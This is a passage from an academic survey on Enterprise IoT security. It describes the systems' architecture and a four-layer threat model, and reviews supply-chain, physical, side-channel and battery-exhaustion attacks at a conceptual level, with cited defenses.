Survey on Enterprise Internet-of-Things Systems (E-IoT): A Security Perspective
Luis Puche Rondon, Leonardo Babun, Ahmet Aris, Kemal Akkaya, A. Selcuk Uluagac
11 Survey on Enterprise Internet-of-Things Systems(E-IoT): A Security Perspective
Luis Puche Rondon, Leonardo Babun, Ahmet Aris, Kemal Akkaya, and A. Selcuk UluagacCyber Physical Systems Security LabDepartment of Electrical and Computer EngineeringFlorida International University, Miami, FloridaEmail:{lpuch002, lbabu002, aaris, kakkaya, suluagac}@fiu.edu
Keywords — Enterprise IoT Systems, E-IoT, Smart Home, SmartOffices, Protocols, Security, BACnet.Abstract —As technology becomes more widely available, mil-lions of users worldwide have installed some form of smart devicein their homes or workplaces. These devices are often off-the-shelf commodity systems, such as Google Home or SamsungSmartThings, that are installed by end-users looking to automatea small deployment. In contrast to these “plug-and-play” systems,purpose-built Enterprise Internet-of-Things (E-IoT) systems suchas Crestron, Control4, RTI, Savant offer a smart solution formore sophisticated applications (e.g., complete lighting control,A/V management, security). In contrast to commodity systems,E-IoT systems are usually closed source, costly, require certifiedinstallers, and are overall more robust for their use cases.Due to this, E-IoT systems are often found in expensive smarthomes, government and academic conference rooms, yachts, andsmart private offices. However, while there has been plenty ofresearch on the topic of commodity systems, no current studyexists that provides a complete picture of E-IoT systems, theircomponents, and relevant threats. As such, lack of knowledge ofE-IoT system threats, coupled with the cost of E-IoT systemshas led many to assume that E-IoT systems are secure. Toaddress this research gap, raise awareness on E-IoT security, andmotivate further research, this work emphasizes E-IoT systemcomponents, E-IoT vulnerabilities, solutions, and their securityimplications. In order to systematically analyze the securityof E-IoT systems, we divide E-IoT systems into four layers:E-IoT Devices Layer, Communications Layer, Monitoring andApplications Layer, and Business Layer. We survey attacks anddefense mechanisms, considering the E-IoT components at eachlayer and the associated threats. In addition, we present keyobservations in state-of-the-art E-IoT security and provide a listof open research problems that need further research.
I. I
NTRODUCTION
The introduction of modern smart consumer electronics hasled to the widespread adoption of smart devices, with over45 million smart home components sold worldwide [1], [2].Most users are familiar with commodity systems, off-the-shelfsmart systems that are easily installed by the average end-user without specialized training (e.g., Samsung SmartThings,Google Home) [3], [4]. However, in more complex installa-tions, where robust, secure, and reliable smart solutions areneeded, Enterprise Internet-of-Things (E-IoT) systems (e.g,Crestron, Control4, Savant, RTI) are accepted solutions. In (a) Conference room with mul-tiple displays and E-IoT systemfor control. (b) Yacht installations which useE-IoT smart systems to controllights and A/V.(c) Smart classrooms to controlall A/V equipment from a touch-screen. (d) E-IoT homes, which usuallyinclude home theaters and smartsystems.
Fig. 1: Use cases of E-IoT systems, in more specializedapplications.contrast to commodity systems, E-IoT offers customized de-ployments, with more use-cases and applications. Offeringusers a broad set of compatible devices devices (e.g., sensors,Audio/Video equipment, interfaces), protocols (e.g., Zigbee, Z-wave, IP, proprietary protocols), custom programmed behavior,and system User Interface (UI) customization. As such, E-IoTsystems are found in locations such as smart offices, smartbuildings, luxury smart homes, yachts, and secure conferencerooms (as illustrated in Figure 1).While the security of many emerging commodity systems iswell-understood due to prior research and mainstream knowl-edge, the security of E-IoT systems has been largely over-looked [5]–[33]. As such, the lack of research and awarenesscoupled with the cost of devices and installation of E-IoThas led many users to mistakenly assume that E-IoT systemsare completely secure. As E-IoT systems follow a uniquedesign with specialty devices, proprietary software, and a largenumber of compatible protocols, there is a need to research a r X i v : . [ c s . CR ] F e b ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacunique threats and security of E-IoT systems. Further, E-IoTsystems have been increasingly popular in smart installations,with Crestron growing to 1.5 billion dollars of annual rev-enue in 2018 and Control4 deploying over 15 million smartproducts in over 400,000 installations worldwide [34], [35].With many of these systems present in high-profile locations,understanding threats and defense strategies for E-IoT systemsshould be of great importance. However, no survey focuseson E-IoT system components, attacks, threats, and relevantdefenses of E-IoT systems. We believe that this research gapin the literature is notable considering the prevalence of E-IoTdeployments and ever-increasing attacks against smart systems.To address this research gap and analyze the security of E-IoT systems, we first divide E-IoT into four distinct layers:E-IoT Devices Layer, Communications Layer, Monitoring andApplications Layer, and Business Layer. As such, we considerE-IoT components at each layer, the associated threats, attacks,and defense mechanisms. Additionally, we present key obser-vations in E-IoT security and provide a list of open issues thatrequire further research. To the best of our knowledge, this isthe first survey focusing solely on E-IoT security and provinga comprehensive review of threats, attacks, and defenses. Withthis work, we aim to raise awareness on E-IoT system securityand motivate further research in this topic.Although there are existing studies on IoT systems, thissurvey focuses solely on relevant threats and solutions to E-IoT systems. This study aims to provide users with adequateinformation on E-IoT system components, vulnerabilities, at-tacks, and defenses. With this work, we also aim to encouragefurther research and development from the research communityon the topic of E-IoT systems. For instance, our survey high-lights widely-used E-IoT proprietary technologies that haveseen no security scrutiny and thus have relied on securitythrough obscurity for decades. This survey may be valuable toresearchers, E-IoT vendors, users, installers, and manufacturersthat want to improve their security practices. Further, userswho do not know about E-IoT concepts may find this study abeneficial resource. Ultimately, this survey sheds light on thesecurity implications of E-IoT systems and raises awareness ofsecurity practices, protocols, and viable threats against E-IoTsystems. Summary of Contributions:
The contributions of thiswork are as follows: • We highlight popular E-IoT system platforms and iden-tify security challenges in these systems. • We categorize and analyze E-IoT components, threats,attacks, and defenses by dividing E-IoT systems intofour distinct layers. • We present the need for further research in E-IoTsystems and a number of proprietary technologies usedin E-IoT. • We open discussion on the security of E-IoT systems,and related defense mechanisms.
Organization:
This work is structured as follows, we beginwith the background information of E-IoT, relevant protocols,and the E-IoT layers in Section II. Section III summarizes thescope of this survey. In Section IV we cover the E-IoT deviceslayer threat taxonomy, vulnerabilities, and defenses. Similarly, Fig. 2: Architecture of a typical E-IoT solution with userinterfaces, controller, and physical devices.in Section V we address the communication layer, Section VIaddresses the monitoring and applications layer, and SectionVII covers the business layer of E-IoT systems. In SectionVIII we highlight the lessons learned from this work and openissues. Related work is presented in Section IX. Finally, weconclude the survey in Section X.II. B
ACKGROUND
In this section, we highlight background information of E-IoT systems and the layered architecture of E-IoT systems.
A. Enterprise Internet of Things (E-IoT)
We use the term
E-IoT solution to describe a fully-functioning E-IoT system deployment. Figure 2 depicts thegeneral architecture of an E-IoT solution. E-IoT systems haveunique design and deployment practices that discriminate themfrom regular consumer IoT systems. In its most basic form,the E-IoT solution contains four core components: the physicaldevices, the controller, user interfaces, and drivers. As allinstallations are custom-made, E-IoT system deployments varyfrom system to system. The first component of E-IoT systemsis the physical devices , which include any device integratedinto the central system (e.g., sensors, televisions, lighting mod-ules). To integrate physical devices, E-IoT systems use drivers ,which provide the system with all the necessary informationto integrate a device to an E-IoT system. Drivers contain infor-mation such as model number, protocol type, code, commands,and physical connections. Each device requires a driver tobe integrated. In E-IoT systems, the controller serves as thecentral processing unit and stores all the drivers as well as user-specific custom programming required for the E-IoT system(e.g., scheduled events). Finally, user interfaces serve as themain point of interaction between users and the E-IoT system.After any third-party devices are integrated, the end-user canuse user interfaces such as tablets, phones, and remotes tocontrol integrated devices. For instance, if an E-IoT user wantsto turn a light on, he/she may use a phone app as the interfaceto communicate with the controller. The controller then usesa smart light driver of an integrated E-IoT light to toggle thelight at a user’s request. As such, with any E-IoT actions manyFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagaccomponents are involved (e.g., hardware, networking, drivers,proprietary, wireless).As designed, E-IoT systems may fulfill different purposes.One such purpose is specialization, such as centralized lightingcontrol systems designed to control electrical loads in locationssuch as yachts or offices [36], [37]. Another purpose of E-IoT systems is integrating previously separate componentsinto a smart system (e.g., Savant, Crestron, and Control4);components integrated can then work together and interactas a single system [38]. For instance, integrating an alarmsystem with a lighting system allows a use case such as turningoff all the lights when the alarm is activated. As such, E-IoTsystems require trained installation and come at a higher costthan standard off-the-shelf systems. This added functionalityover commodity systems has led E-IoT systems to becomepopular in expensive locations such as yachts, classrooms,smart offices, conference rooms, and luxury smart homes asshown in Figure 3. Further, the installation of an E-IoT systemis done by an integrator , a certified installer that performs thephysical and software configuration for such a system. Theconfiguration process requires specialized training and tools,which are provided by the system vendor to the integrator [39],[40]. However, hardware and software (e.g., integrated devicesand drivers) used in E-IoT may also come from unverifiedthird-party vendors and sources [41].
B. Consumer IoT vs. E-IoT
As commodity IoT smart systems have some limitations(e.g., scale, compatibility), E-IoT offers a solution for complexand reliable deployments. In this subsection we highlight thedifferences and benefits of E-IoT and why E-IoT solutionsare chosen over commodity IoT. As such, E-IoT has someunique security concerns and threats. We outline some of thesedifferences in Table I.
Compatibility.
As smart systems grow in scale, a user mustdetermine the best solution to easily control many differentdevices. While commodity systems are limited in scale andcompatible products, there are fewer limitations on what can beintegrated into E-IoT. As E-IoT vendors offer components suchas drivers, which are used to integrate third-party devices withE-IoT systems, many third-party devices are compatible withE-IoT systems. However, from a security standpoint, broadsupport of protocols can pose a threat as an attacker may beable to attack through many available protocols. This is trueas more diverse systems have more possible points of failure.
Complexity.
Commodity smart systems are designed to handlesmall deployments of IoT devices. While this use case issufficient for most consumers, commodity smart systems arenot a viable solution for large, complex deployments. Forinstance, multi-room video and audio distribution is one ofthe more complex applications of E-IoT. With audio/videoswitchers that can control up to 164 inputs and outputs, E-IoT becomes a reliable way to manage large systems anddeployments.E-IoT systems also allow for a high degree of flexibility andcustomization. A number of protocols and modes of commu-nication are supported with drivers and expandable hardware Fig. 3: Smart building with use-cases in different locations.components [42]. As a result, E-IoT can integrate more devicesthan consumer systems. All in all, the unprecedented level ofcomplexity can mean that more vulnerabilities may occur atmore stages and sectors of the E-IoT system in comparison tocommodity IoT systems.
Delegation.
As the installation of E-IoT components is oftencomplex; many users opt to have installation and maintenanceof E-IoT systems delegated to a dedicated contractor. As such,in a similar manner to electricians, plumbers, and other special-ists, E-IoT integrators are contracted only for the installationand maintenance of E-IoT systems. In effect, the end-userdoes not need to understand the technical details of the E-IoTsystem, the user only needs to know how to operate the system,removing layers of complexity for any visitors. The delegationof installation and maintenance of E-IoT means that in additionto technical expertise, integrators must consider the securityaspects of E-IoT systems. Thus, clients depend on their hiredintegrators for the security of their systems. As such, if anintegrator is careless, or does not keep security in mind, theE-IoT system will be insecure without the owner’s knowledge.
Offline Systems.
Some smart systems (e.g., Google home,Samsung SmartThings) have inherent limitations in their de-sign as they rely on a constant Internet connection to functionproperly. Some E-IoT deployments may need offline systemsto operate where an Internet connection is not desirable or toocostly. For instance, a secure conference room may want tohave all the equipment isolated from all the network, or yachtinstallations where Internet availability is costly or sporadic.From a security perspective, beyond losing vendor support,isolated systems may not receive security updates and may beprone to exploits if systems are not patched due to limitedconnectivity. However, it can also protect such isolated E-IoTenvironments from the attacks originated from the Internet.
Cost.
As E-IoT requires specialized integrators, custom pro-gramming, proprietary hardware, and dedicated technical sup-port, the systems come at a higher cost. Further, the physicalinstallation of E-IoT often involves fully rack-mounted, cable-managed systems throughout a building or home. While con-sumer IoT solutions are designed be affordable by end-users,E-IoT installations may be valued at hundreds of thousandsof dollars depending on the complexity [43]. The high cost ofFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacTABLE I: Commodity IoT vs E-IoT Solutions.
Commodity IoT Solutions E-IoT Solutions
Simpler, easily deployable solutions More complex, diverse smart solutionsLess compatible, approved devices More compatible 3rd-party devicesLower cost of installation and maintenance High cost of installation, maintenance, and programmingUser-deployed and maintained smart systems Installer-deployed and maintained smart systemsMore often open-sourced, with technical documentation available publicly Closed-source systems, with no technical documentation availableOften cannot be deployed as completely offline systems Must be deployed as always-offline systems in some use-cases
E-IoT systems may lead some users to wrongly assume theirsystems are secure.
C. Architecture of E-IoT Systems
To better analyze E-IoT solution components and relevantthreats, we divide E-IoT systems into separate layers asdepicted in Figure 4. Specifically, the layered E-IoT solutionas described includes four distinct layers: (1) E-IoT DevicesLayer, (2) Communications Layer, (3) Monitoring and Ap-plications Layer, and (4) Business Layer. The lowest layer,
E-IoT devices layer includes the integrated E-IoT devices,physical interfaces used by devices, sensors, and any physicalcomponents of E-IoT systems. Next comes the communicationlayer , which possesses all the communication protocols (e.g.,open-source and proprietary) used by integrated devices inthe E-IoT devices layer. To manage communication, config-uration, software, and programmed events in E-IoT systems,the monitoring and applications layer contains all software-based components (e.g., drivers, E-IoT applications, and con-figuration software) of E-IoT systems used by integrators andusers. Finally, the business layer includes cloud componentsof an E-IoT system, for instance, remote services or remotestorage used by an E-IoT system. The combination of theselayers creates a unique technology solution that is highlycustomizable to any user’s need. For instance, with an E-IoTsystem, a user can configure events such as a good morningtimer which simultaneously plays a specific song, opens theshades, and turns on the lights every morning or a panic buttonto call the police, blare the alarms, and flash all the lightsintegrated to a system. Additional details on the four layersare as follows:
E-IoT Devices Layer.
The E-IoT devices layer consists of allphysical components of E-IoT systems. A physical componentmay be physical wiring, sensors, physical interfaces, or con-nection endpoints. E-IoT systems use many physical devicesas part of their systems (e.g., motorized lifts, HVAC, sensors).These devices may be integrated for different applications.In some cases, they may be simply controlled by the systemsuch as motorized projector lifts. Other cases may be externalsensors such as water leak sensors to automatically shut offwater valves prevent flooding.
Communications Layer.
The communications layer containsall protocols, interfaces, and communication services used byE-IoT systems. This includes protocols in any component ofE-IoT systems. To integrate a wide range of smart devices intothe central system, E-IoT systems must support a multitude ofcommunication protocols (e.g., Zigbee, Cresnet, Serial) usedby smart devices. For instance, to integrate alarm systems to Fig. 4: E-IoT system four-layer model used in this survey.larger E-IoT systems, integrators will often use serial-basedadapters, or an available IP interface [44], [45].
Monitoring and Applications Layer.
The applications andmonitoring layer contains software-based components of anE-IoT systemFor instance, E-IoT system configuration, drivers, firmware,or programmable behavior all can be considered part of theapplication layer. E-IoT systems must have the capability tobe customized for every installation. As all deployments maybe different and fit for different purposes, custom applicationsare a large part of E-IoT systems.
Business Layer.
The topmost layer for E-IoT systems is thebusiness layer, which handles all external cloud services usedby E-IoT solutions. While not used in all implementations,some E-IoT systems rely on cloud computing and onlineservices for features and integration. For instance, some E-IoT system use-cases require ’always offline’ configurationafter being deployed (e.g., yachts, remote locations, securelocations). Cloud services provide E-IoT systems with ex-panded capabilities, remote connections, and other services.For instance, E-IoT systems with CCTV components may usecloud storage services to store video feed in case the localvideo recorder is damaged or stolen [46].III. S
COPE OF T HE S URVEY
In this section, we highlight the topics covered in this survey.While covering the topics that are closely related to E-IoT, wedo not consider the topics that are not directly related to E-IoTor that are common to general computer systems in the scopeof this study.FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac
Scope of E-IoT Devices Layer.
For the E-IoT devices layersection, we cover attacks (e.g., sensory attacks, node theft,battery exhaustion) and defense mechanisms that target com-ponents at the E-IoT devices layer. Included in these topicsare E-IoT devices, supply chain attacks, and physical accessattacks relevant to E-IoT systems. Topics outside of the scopeof E-IoT devices layer are attacks on chipsets (e.g., processorside-channel attacks) and other physical devices that are eitherwidely researched or unique to E-IoT.
Scope of Communications Layer.
This survey covers commu-nication interfaces, publicly-documented protocols, proprietaryprotocols, and other relevant communication components aspart of the communications layer. As such, this survey coversjamming attacks and other well-known attacks against publicand proprietary protocols used in E-IoT. Finally, communica-tion protocols such as TCP/IP, cellular communication, long-range radio protocols such as LoRaWAN, and their respectiveattacks are outside of this survey’s scope as they are notcommon in E-IoT use-cases.
Scope of Monitoring and Applications Layer.
Topics inthe monitoring and applications layer include E-IoT software,configuration, and software services. Topics outside of thislayer’s scope are operating systems as they are a common topicof research and not exclusive to E-IoT systems. For instance,Linux-based operating systems are common in E-IoT and othersmart systems, making Linux a common topic of research.Also, outside of this layer’s scope, web-based DDoS attacks,mobile application threats, ransomware, firmware attacks, andcommon software vulnerabilities.
Scope of E-IoT Business Layer.
Relevant topics to theE-IoT business layer include remote access cloud services,maintenance services, and CCTV data storage. As the E-IoTbusiness layer is not employed by all E-IoT systems, and cloudsecurity is a diverse field, some topics are not covered. Topicsoutside of this survey’s scope are encrypted storage access,computation of stored E-IoT content in cloud environments,online microservices, advanced persistent threats, virtualizationtechnologies, general data storage, and other cloud conceptsthat are uncommon for E-IoT.IV. E-I O T D
EVICES L AYER : C
OMPONENTS AND S ECURITY
In this section, we cover the E-IoT Devices layer, threats,defenses, and their implications. First, we introduce compo-nents of the E-IoT devices layer, and then cover threats andattacks. Finally, we give an overview of possible defense andmitigation mechanisms. Table II provides an overview of E-IoT Device-layer components, threats, attacks, and mitigationstrategies covered in this section.
A. Elements of the E-IoT Devices Layer
E-IoT Devices.
Many devices, such as sensors and lightingcontrollers, are integrated into E-IoT systems to expand the usecases and functionality. Integrated devices may serve specificpurposes (e.g., television, media player) or be a part of largeruse-cases such as power control modules for lighting controlsystems.
Sensors.
E-IoT and E-IoT-integrated devices will very oftenhave sensors used to trigger programmed actions in an E-IoT system. Sensors may play a role in E-IoT in severaldifferent ways. For instance, individual sensors (e.g., glassbreak, motion, contact) can be integrated directly into an E-IoT system thanks to the official support of E-IoT vendorsfor several protocols (e.g., ZigBee, Bluetooth, Z-wave) [107]–[109]. In addition, an external system, such as an alarmsystem, can be configured to work with an E-IoT deployment.For instance, an E-IoT deployment with water leak detectionsensors and automated valves can be configured to close aleak, inform the user via text, and display a message on E-IoTinterfaces about the issue [110].
B. Threat Model for E-IoT Devices Layer
For this layer, Mallory compromises the E-IoT systemsolely through physical access to interfaces, devices, cabling,and unattended equipment. To compromise an E-IoT systemthrough the E-IoT devices, Mallory is assumed to have phys-ical access to devices during the manufacturing, installation,operation, or maintenance stages of the E-IoT system. Malloryis capable of this, as security for device-layer components inE-IoT environments relies on the specific devices and the inte-grator’s installation practices (e.g., directional antennas, accessrestriction, tamper-proofing). We explain Mallory’s possibleactions at different stages of the E-IoT devices as follows:
Manufacturing and Transportation.
In the manufacturing ortransportation stages of E-IoT equipment, Mallory may haveseveral opportunities to compromise a device. During thesestages, insiders (e.g., manufacturing workers, delivery drivers,packaging personnel) all have direct access to the E-IoTdevice before a device is installed, making supply chainattacks possible for Mallory, who may be in the role of aninsider attacker. Further, Mallory could be an employee ofoutsourced manufacturing, and as such, it may be particularlydifficult to prosecute Mallory during the manufacturing andtransportation stages. In this role, Mallory may target E-IoTdevices specifically if she has prior knowledge that E-IoTcomponents may be installed in sensitive locations (e.g., secureconference room, access control, enterprise network).
Deployment, Operation, and Maintenance.
E-IoT installationsmay see visitors such as presenting guests or maintenanceworkers that have direct access to E-IoT equipment. As such,Mallory as a visitor may perform a node capture attack andfurther compromise an E-IoT system. Additionally, if Malloryis a more knowledgeable attacker, she may perform sensorychannel and side-channel attacks. In other roles, such as a rolewhere Mallory is an IT professional, she could compromisedevices in the same manner.
C. E-IoT Devices Layer: Attacks and Vulnerabilities
In the following subsection, we cover attacks and vulnera-bilities relevant to the E-IoT devices layer. These attacks canbe performed by Mallory as highlighted in the threat model.
Supply Chain Attacks.
Even before E-IoT devices reachintegrators, installers, and consumers, devices may be compro-mised during manufacturing and distribution stages. SeveralFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacTABLE II: Overview of E-IoT Devices Layer Attacks, Threats, and Mitigations.
Component Attack/Threat Mitigations
Supply Chain Supply Chain Attacks [47]–[59] RFID tagging during manufacturing and transport [60]–[62].Novel secure supply change architectures [63].Other supply chain attacks & defenses are summarized in Table IIIPhysical Attacks Reset Sequence Attacks [64], [65] Limiting device access, device monitoring, and access control.Node Capture Attacks [66]–[73] Limiting device access, device monitoring, access control, and loss prevention practices [74].Side and Sensory Channels EM Attacks [75]–[79] Best installation practices, directional antennas [80].Video Side-Channel [81], [82] Software-based solutions may help mitigate several video-based side-channel attacks [83]–[87].Sensory Side-Channel Attacks [88]–[96] Solutions to sensory attacks include dedicated machine-learning frameworks [18], [97], [98].Battery Exhaustion Battery Exhaustion Attacks [99]–[102] IDS frameworks such as MVP-IDS and B-SIPS [101], [103].IDS-based solutions designed to protect against battery exhaustion [104], [105].Rate Limiting solutions [106] articles have highlighted supply chain threats and providedexamples of how systems in different industries (e.g., med-ical, banking) have been targeted and compromised throughsupply chain attacks [47]–[52]. As specific industries havebeen targeted, it is reasonable to assume that E-IoT systemsmay be a future target for supply chain attacks. With theprice-point of E-IoT systems and high-profile clients, attackersmay find E-IoT systems an attractive target for supply-chainattacks. Work by Farooq et al. analyzed the risks and researchchallenges in IoT supply chain security [53]. This workhighlighted three types of interactions in the supply chain:device-supplier interactions, supplier-supplier interactions, anddevice-device interactions. In device-supplier interactions, asupplier provides maintenance, security patches, and upgradesto devices. Supplier-supplier interactions are when suppliersuse different companies to distribute devices. Finally, device-device interactions occur due to the inter-connectivity ofdevices in the supply chain, that is, communication betweendevices (e.g., configuration) in the supply chain. As such, anattacker could compromise a device at any of these interac-tions. The UK’s National Cyber Security Centre highlightedseveral attacks that can occur from supply chain interactions[54]. For instance, malware inserted into vendor websites ordevices can “trojanize” devices before the devices leave thesupply chain. As compromised software is very difficult todetect at the source, target companies may not suspect thesoftware is altered or illegitimate. Supply chain threats alsoextend to embedded hardware such as chipsets, unauthenti-cated parts, and counterfeit components inserted in the supplychain. These counterfeit components may impact systems bybeing of lower quality [55]. In other cases, hardware threatsextend to hardware trojans, which have been an ongoingtopic of research [56]–[58]. In this case, malicious chipsetsand electronic components are inserted into devices, usuallyduring manufacturing stages, compromising the integrity of thedevice. These types of attacks have been observed, in a notablecase where Chinese manufacturers infiltrated 30 large U.Scompanies using malicious hardware components embeddedin networking devices [59]. As such, E-IoT can easily becomea target to a variety of supply chain attacks, as distribution,manufacturing, and installation stages of E-IoT provide ampleopportunity to compromise E-IoT devices.
Physical Attacks.
In any E-IoT deployment, E-IoT deviceswill be found throughout the location or establishment. Someof these devices may be installed in private, unsupervised areas (e.g., a keypad in a closet, an empty conference room). Assuch, it may be possible for visiting attackers to interact withphysical devices integrated into E-IoT systems. As severalvulnerabilities against physical devices rely on physical accessto E-IoT devices and interfaces (e.g., node capture, tampering,button resets, theft). Physical access to devices and E-IoT com-ponents may allow an attacker to perform malicious actions onE-IoT devices, enabling programming mode, hard resets, orotherwise, change the configuration in E-IoT devices that canrender them inoperable. For instance, “button sequences” maypresent a vulnerability to E-IoT devices. Reset sequences areused for purposes such as changing a device’s configuration,resetting a device to factory settings, or even gain informationabout devices [64], [65]. As such, an attacker can use thesesequences to alter physical devices’ configuration, gather in-formation, or otherwise cause E-IoT components to becomeunavailable to the E-IoT system.Physical access to E-IoT devices allows malicious actors toperform node capture attacks , where devices are physicallycaptured (or stolen) to gather sensitive information about asystem [66]. Although there is no study on node capture attacksin E-IoT, attacks applied on related domains may be applicableto E-IoT as well. In this respect, work by Wang et al. coveredthe implications of node capture attacks in wireless sensornetworks (WSNs), which are relevant to wireless E-IoT devices(e.g., sensors, interfaces, remotes) as they often share thesimilar communication technologies [67]. The authors of thework identified ten unique vulnerabilities that can be exploitedthrough node capture attacks affecting session keys, users,sensor nodes, gateways, and availability of the network. Assuch, the attacks could acquire communication keys, eavesdropon messages, impersonate devices, track user activity, andimpersonate users. Several other pieces of literature havediscussed node capture attacks that exploit vulnerabilities togather keys from connected devices [68]–[73]. The work ofLin et al. focused more on the efficiency of node captureattacks and introduced the full graph attack (FGA), with twooptimal algorithms for this attack [111]. The attack specializesin compromising relationships between nodes and paths. Assuch, the attacks reportedly increased the efficiency by 50%compared to previously proposed attacks.
Side-Channel and Sensory Channel Attacks.
Side-channelattacks are threats against the implementation of computersystems, rather than inherent weaknesses. These attacks allowattackers to compromise a system or component through anFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacindirect channel (e.g., timing information, power consumption,electromagnetic leaks, auditory channels) [75]. A number ofE-IoT components may be vulnerable to side-channel attacksthrough electromagnetic (EM) approaches. For instance, astudy by Smulders et al. on serial-based communication sug-gested that electromagnetic radiation can be used to eavesdropon physical cables and serial-based communication as a typeof side-channel attack [76]. These methods take advantage ofa known fact that most electronic equipment emits electricalradiation, and bit amplitude in serial-based communicationis relatively larger than other signals [77]. Their tests per-formed with a standard AM/FM receiver antenna allowedintercepting and reading signals going through the wire. Thework concluded that data signals transmitted over serial-basedcommunication could be intercepted from several meters away.Further, this work noted that the equipment required to performthese scans is inexpensive and readily available, as such,similar attacks may be possible in similar unsecured networkswith improved equipment and techniques. Legacy systems, orsystems without authentication or encryption may be espe-cially vulnerable to these or similar attacks. Electromagneticattacks are not limited to wiring, as work published as earlyas 1986 by Eck et al. noted that electromagnetic radiationeavesdropping attacks are possible in video display units [78].Further work by Kuhn et al. noted that while technology haschanged, electromagnetic eavesdropping can work on moremodern LCD displays [79]. Researchers have found other waysto compromise systems that may be relevant to E-IoT. Forinstance, Savage et al. showed that with recorded video (e.g.,from a CCTV system, intercom systems), an attacker could usepassive sound recovery to eavesdrop on conversations [81].Further work by Davis et al. demonstrated that an attackercould also use vibrations on object surfaces for eavesdroppingunder certain conditions (e.g., visible glass or water) [112].As E-IoT may control smart lights, light-emitting devices,and light sensors, threats posed by visible-light side-channelsmay affect E-IoT deployments. Information leakage throughoptical side-channels has been an active topic of research. Forinstance, Xu et al. created a video recognition attack wherethey were able to identify a video being watched on a televisionusing the light emitted by the television through a window [82].Similar works as presented by Schwittmann et al. used ambientlight sensors on smartphones and smartwatches to performsimilar attacks [88], [89]. Alternatively, Light Ears, presentedby Maiti et al., proposed a new attack vector designed to infera user’s private data and preferences from smart lighting mediavisualization features [90]. Based on this research, researchersused the light and sound intensity of smart lights to inferongoing audio and video. Alternatively, covert optical channelshave been researched, with Loughry et al. providing the firstcall of attention to possible information exfiltration attacks onair-gapped systems by using LED light indicators [95]. Similardata-exfiltration attacks have been demonstrated using LCDdisplays, security camera infrared lights, scanners, and smartlights [91]–[94], [96].As E-IoT systems rely on sensors for accurate measurementsand to trigger pre-programmed events, physical sensor threatsare a concern for E-IoT. Sensor threats and security have been an active topic of research with multiple surveys. However,most of these surveys focus on sensor communication andwireless sensor networks [113]–[123]. As sensors are a vastresearch topic, different attacks and vulnerabilities on sensorshave been discovered that can be applicable to E-IoT. Ana-log threats such as sound waves can maliciously influencean accelerometer’s output and cause unintended effects inan E-IoT system configured to respond to specific readings[124]. Other proposed attacks, such as D
OLPHIN A TTACK ,target microphones through inaudible voice commands, can beeffective against E-IoT systems that integrate voice recognitionand microphones [125]. With many sensors lacking securitymechanisms, E-IoT systems may be particularly vulnerable tosensor attacks. Work presented by Uluagac et al. summarizedseveral sensory channels in cyber-physical systems (CPS) anddevices that can be targeted by an attacker [126]. Thesechannels are the light, seismic, acoustic, and infrared channels.The light channel functions through light sensors and ambientlight temperatures. The light channel may be used in E-IoTto trigger programmed events at nighttime. Seismic channelsare vibrational channels that can be detected by devices suchas accelerometers that detect the physical movements of adevice. Acoustic channels are based on sound waves and canbe comparable to sonar technologies. Finally, infrared channelsuse infrared emitters for navigation assistance and can presenta covert side-channel for attacks as it is not visible to thehuman eye. Further, this work highlighted that these sensorychannels can all be used to trigger existing malware and thattraditional security mitigation strategies do not defend againstsensory channel attacks.Other physical attacks on sensors rely on multiple sensorsto function. One of the most researched examples is keystrokeinference on devices with unprotected sensors [127]–[141].While keystroke inference research centers around mobiledevices, it may be relevant to E-IoT. Many E-IoT interfacedevices (e.g., dedicated touchscreens, keypads, remotes) havesimilarities with mobile devices as they possess several sensorsand receive user input. Many of these keystroke inferenceattacks rely on multiple sensors in different sensor channelsto infer sensitive information (e.g., what a user is typing fromsensor activity). For instance, PitchIn, a work presented byHan et al. proved that exploiting non-acoustic sensors used insmart environments can allow an attacker to perform speechreconstruction attacks [142]. Multiple sensors (e.g., geophones,accelerometers, gyroscopes) were used to reconstruct audioand perform word recognition in the mentioned work.
Battery Exhaustion Attacks.
As a number of E-IoT devicesare battery-powered (e.g., remotes, interfaces, sensors, etc.),an attacker could use battery exhaustion attacks to impactthe operation of E-IoT systems negatively. Battery Exhaustionattacks are a type of Denial-of-Service (DoS) attack that aimsto deplete the batteries of devices by forcing the device toperform an excess amount of tasks [99], [100]. Moyers et al.presented the effects of wireless and Bluetooth battery deple-tion attacks on mobile devices [101]. This work classified threedistinct types of battery exhaustion implementations, servicerequest power attacks , benign power attacks , and malignantpower attacks . For service request power attacks, attackersFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagactarget devices by making repeated requests to these devicesand exhaust power through the wireless network interfacecard. In benign power attacks, victims are forced to performrepeated tasks (e.g., data processing, diagnostics) and consumelarge amounts of power. Finally, malignant power attacks areusually implemented with malware designed to increase powerconsumption in a device (e.g., increasing the CPU clock).Other work by Martin et al. highlighted the effects of theseattacks on wireless devices, noting that damage caused bybattery exhaustion attacks may also cause long-term damageto battery life in addition to a denial-of-service condition whena device becomes unavailable [102]. D. Mitigation of E-IoT Devices Layer Attacks
In this subsection, we highlight possible mitigations to E-IoT devices-layer threats.
Supply Chain Defenses.
